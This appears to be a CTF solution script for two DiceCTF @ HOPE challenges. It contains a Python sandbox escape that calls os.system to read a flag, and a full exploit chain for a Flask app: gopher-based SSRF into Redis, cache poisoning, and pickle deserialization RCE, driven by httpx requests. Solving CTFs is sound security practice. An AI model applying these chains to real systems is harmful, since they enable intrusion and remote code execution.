https://ctftime.org/event/1706
- web / your-space
- misc / bonk
https://ctftime.org/event/1706
| # DiceCTF @ HOPE | |
| # https://ctftime.org/event/1706 | |
| # misc / bonk | |
| # 30 solves / 357 pts | |
| import string | |
def gen_str(keyword: str) -> str:
    """Return an expression that evaluates to *keyword* without a string literal.

    Each character of ``keyword`` is looked up by index in the docstring of
    ``dict`` (reached on the target as ``...__globals__.__doc__``), and the
    single-character lookups are chained together with ``.__add__(...)``.

    Args:
        keyword: Non-empty text; every character must occur in ``dict.__doc__``.

    Returns:
        Source text of an expression that builds ``keyword`` character by
        character.

    Raises:
        ValueError: If ``keyword`` is empty or contains a character that does
            not occur in the reference docstring.
    """
    if not keyword:
        raise ValueError("keyword must not be empty")

    # {}.__doc__
    # Characters are addressed by position, so the whitespace must match the
    # interpreter's text exactly: 4- and 8-space indents on continuation
    # lines, and two spaces after "list." and after "example:".
    doc = (
        "dict() -> new empty dictionary\n"
        "dict(mapping) -> new dictionary initialized from a mapping object's\n"
        "    (key, value) pairs\n"
        "dict(iterable) -> new dictionary initialized as if via:\n"
        "    d = {}\n"
        "    for k, v in iterable:\n"
        "        d[k] = v\n"
        "dict(**kwargs) -> new dictionary initialized with the name=value pairs\n"
        "    in the keyword argument list.  For example:  dict(one=1, two=2)"
    )

    xs = []
    for c in keyword:
        position = doc.find(c)
        if position < 0:
            raise ValueError(f"character {c!r} does not occur in dict.__doc__")
        xs.append(position)

    ys = [f'().__class__.__base__.__subclasses__()[133].__init__.__globals__.__doc__[{x}]' for x in xs]

    # Fold from the right: c0.__add__(c1.__add__(...cN)).
    payload = ys[-1]
    for y in reversed(ys[:-1]):
        payload = f'{y}.__add__({payload})'
    return payload
def skip_str(xs: str) -> str:
    """Follow every character of *xs* with one filler character.

    Brackets and parentheses are followed by a copy of themselves, digits by
    ``"0"`` and every other character by ``"_"``. The characters at even
    positions of the result therefore spell out ``xs`` again.
    Presumably the target only evaluates every second character - confirm
    against the challenge source.
    """
    fillers = {bracket: bracket for bracket in "()[]"}
    fillers.update(dict.fromkeys(string.digits, "0"))
    return "".join(ch + fillers.get(ch, "_") for ch in xs)
# Step 1 (already done, kept for reference): list the working directory.
# payload = f'().__class__.__base__.__subclasses__()[133].__init__.__globals__[{gen_str("system")}]({gen_str("ls")})'
# print(skip_str(payload))
# # $ ls
# # flag.2686924749.txt
# # run

# Step 2: look up "system" in the globals of subclass #133's __init__ and call
# it with a glob that matches the flag file found above. Both strings are
# built with gen_str, and the result is printed in its skip_str form.
# NOTE(review): index 133 is specific to the target interpreter - confirm.
payload = (
    "().__class__.__base__.__subclasses__()[133].__init__.__globals__"
    f'[{gen_str("system")}]'
    f'({gen_str("cat flag.*.txt")})'
)
print(skip_str(payload))
# $ cat flag.*.txt
# hope{c0ntrived_and_us3less_but_st1ll_kinda_cool?}
| # DiceCTF @ HOPE | |
| # https://ctftime.org/event/1706 | |
| # web / your-space | |
| # 7 solves / 469 pts | |
| # My exploitation: | |
| # * SSRF via Gopher protocol to set an arbitrary value in Redis | |
| # * Limitation: url length <= 96 | |
| # * Cache poisoning for the result of `@cache.memoize`, which uses Redis internally | |
| # * RCE in `pickle.loads` to get a flag value from `__import__("sys").modules["app"]` | |
| import pickle | |
| import urllib.parse | |
| import httpx | |
| import string | |
| import random | |
| import time | |
| # BASE_URL = "http://localhost:8000" | |
| BASE_URL = "https://web-your-space-fb877a3481335bd5.mc.ax" | |
def make_gopher(payload: str) -> str:
    """Wrap *payload* in a gopher:// URL aimed at ``redis:6379``.

    The payload is percent-encoded and placed after the ``_`` in the URL path.
    """
    encoded = urllib.parse.quote(payload)
    return f"gopher://redis:6379/_{encoded}"
def gen_delete_payload(key: bytes) -> str:
    """Return the gopher URL that sends ``DEL <key>``."""
    command = "DEL " + key.decode()
    return make_gopher(command)
def gen_append_payload(key: bytes, value: bytes) -> str:
    """Return the gopher URL that sends ``APPEND <key> "<value>"``.

    The value is written as a double-quoted argument. Its text is the
    ``bytes`` repr of *value* without the leading ``b`` and the surrounding
    quotes, so non-printable bytes appear as backslash escapes. Double quotes
    are backslash-escaped so they cannot end the argument early.
    """
    # Hex-escaping every byte would also work, but costs 4 characters per byte:
    # value_str = "".join(["\\x" + hex(c)[2:].zfill(2) for c in value])
    literal = str(value)[2:-1]
    escaped = literal.replace('"', '\\"')
    command = 'APPEND {} "{}"'.format(key.decode(), escaped)
    return make_gopher(command)
def gen_rename_payload(key1: bytes, key2: bytes) -> str:
    """Return the gopher URL that sends ``RENAME <key1> <key2>``."""
    source, destination = key1.decode(), key2.decode()
    return make_gopher(" ".join(("RENAME", source, destination)))
def gen_payloads(key: bytes, value: bytes, limit: int) -> list:
    """Build the gopher URLs that store *value* under *key*.

    The value is assembled in a scratch key ``x`` through a series of APPEND
    commands, each cut so that its URL is at most *limit* characters long.
    The scratch key is then renamed to *key*. The returned list is ordered:
    DEL scratch, DEL key, APPEND..., RENAME.

    Args:
        key: Destination key.
        value: Raw bytes to store.
        limit: Maximum length of each APPEND URL. The DEL and RENAME URLs are
            not checked against it.

    Returns:
        The URLs, in the order they have to be delivered.

    Raises:
        ValueError: If not even a one-byte chunk fits within *limit*.
    """
    tmp_key = b"x"
    payloads = [gen_delete_payload(tmp_key), gen_delete_payload(key)]

    offset = 0
    while offset < len(value):
        # Greedy: take the longest chunk whose URL still fits. A URL is always
        # longer than the chunk it carries, so sizes above `limit` are skipped.
        longest = min(len(value) - offset, limit)
        for size in range(longest, 0, -1):
            payload = gen_append_payload(tmp_key, value[offset:offset + size])
            if len(payload) <= limit:
                payloads.append(payload)
                offset += size
                break
        else:
            # An explicit raise (not `assert`): with assertions disabled the
            # loop would otherwise spin forever without advancing `offset`.
            raise ValueError(
                f"limit {limit} is too small to append even one byte at offset {offset}"
            )

    payloads.append(gen_rename_payload(tmp_key, key))
    return payloads
# Redis key holding the memoize version of `num_subscriptions`.
# NOTE(review): key layout assumed from Flask-Caching's naming - confirm.
memver_key = b"flask_cache_app.routes.space.num_subscriptions_memver"

# Version token to plant under memver_key; also the suffix of the poisoned
# cache key. The exploit relies on it being exactly six bytes long.
key = b"aaaaaa"
assert len(key) == 6

# Stored form: a "!" marker followed by the pickled version string.
memver_body = b"!" + pickle.dumps(key.decode())
class FLAG:
    """Pickle gadget: unpickling an instance evaluates an expression.

    The expression reads ``flag`` from the already-imported ``app`` module of
    whichever process loads the pickle.
    """

    def __reduce__(self):
        # pickle records (callable, args) and calls callable(*args) on load.
        expression = '__import__("sys").modules["app"].flag'
        return (eval, (expression,))
# Poisoned cache entry: "!" marker + pickle of the gadget, stored under the
# memoize cache key that ends with the planted version token.
# NOTE(review): the "xk28vUr8TTGcOgNT" part is taken as given - confirm how it
# is derived for the target function.
evil = FLAG()
cache_key = b"flask_cache_xk28vUr8TTGcOgNT" + key
cache_body = b"!" + pickle.dumps(evil)

# Maximum webhook URL length accepted by the target.
limit = 96

# Write the version token first, then the poisoned entry.
payloads = [
    *gen_payloads(memver_key, memver_body, limit),
    *gen_payloads(cache_key, cache_body, limit),
]
def create_user(client: httpx.Client):
    """Register an account with random 10-letter credentials via *client*.

    Expects the server to answer ``POST /register`` with a 302 redirect.
    Presumably the session cookie stays on *client* for later calls - confirm.
    """
    letters = string.ascii_letters
    username = "".join(random.choice(letters) for _ in range(10))
    password = "".join(random.choice(letters) for _ in range(10))
    credentials = {"username": username, "password": password}

    res = client.post(
        f"{BASE_URL}/register",
        data=credentials,
        follow_redirects=False,
    )
    assert res.status_code == 302, res
def create_space(client: httpx.Client):
    """Create a space with a random 10-letter name and return its URL.

    Expects ``POST /create`` to answer with a 302 redirect. The returned URL
    is ``BASE_URL`` followed by the redirect's ``Location`` header.
    """
    form = {"name": "".join(random.choice(string.ascii_letters) for _ in range(10))}
    res = client.post(f"{BASE_URL}/create", data=form, follow_redirects=False)
    assert res.status_code == 302, res

    location = res.headers["Location"]
    return f"{BASE_URL}{location}"
def set_webhook(client: httpx.Client, url: str):
    """Set the logged-in user's webhook to *url* via ``POST /profile``.

    Expects a 200 response.
    """
    form = {"webhook": url}
    res = client.post(f"{BASE_URL}/profile", data=form, follow_redirects=False)
    assert res.status_code == 200, res
def subscribe_space(client: httpx.Client, space_url: str):
    """Subscribe the logged-in user to the space at *space_url*.

    Issues ``GET <space_url>/sub`` and expects a 302 redirect.
    """
    endpoint = f"{space_url}/sub"
    res = client.get(endpoint, follow_redirects=False)
    assert res.status_code == 302, res
def post_to_space(client: httpx.Client, space_url: str):
    """Publish a post with random 10-letter content to the space.

    Issues ``POST <space_url>/post`` and expects a 302 redirect.
    """
    form = {"content": "".join(random.choice(string.ascii_letters) for _ in range(10))}
    res = client.post(f"{space_url}/post", data=form, follow_redirects=False)
    assert res.status_code == 302, res
# Exploit driver: create a space, attach one subscriber per gopher payload,
# post to the space, then poll the space page until a flag shows up.
with httpx.Client() as main_client:
    create_user(main_client)
    space_url = create_space(main_client)
    print(space_url)
    # One throwaway account per payload: each account carries one payload as
    # its webhook URL and subscribes to the space.
    for payload in payloads:
        with httpx.Client() as sub_client:
            create_user(sub_client)
            set_webhook(sub_client, payload)
            subscribe_space(sub_client, space_url)
    # NOTE(review): the original indentation was lost; this call is placed
    # after the subscription loop (a single post) - confirm it was not meant
    # to run once per payload inside the loop.
    # Presumably a new post makes the server call each subscriber's webhook.
    post_to_space(main_client, space_url)
    # Poll once per second, for at most 100 attempts.
    for i in range(100):
        time.sleep(1)
        print(f"{i = }")
        res = main_client.get(space_url)
        assert res.status_code == 200, res
        if "{" in res.text:
            # A "{" in the page is taken as the sign that the flag is there;
            # print every line that contains one and stop.
            print([line for line in res.text.splitlines() if "{" in line])
            break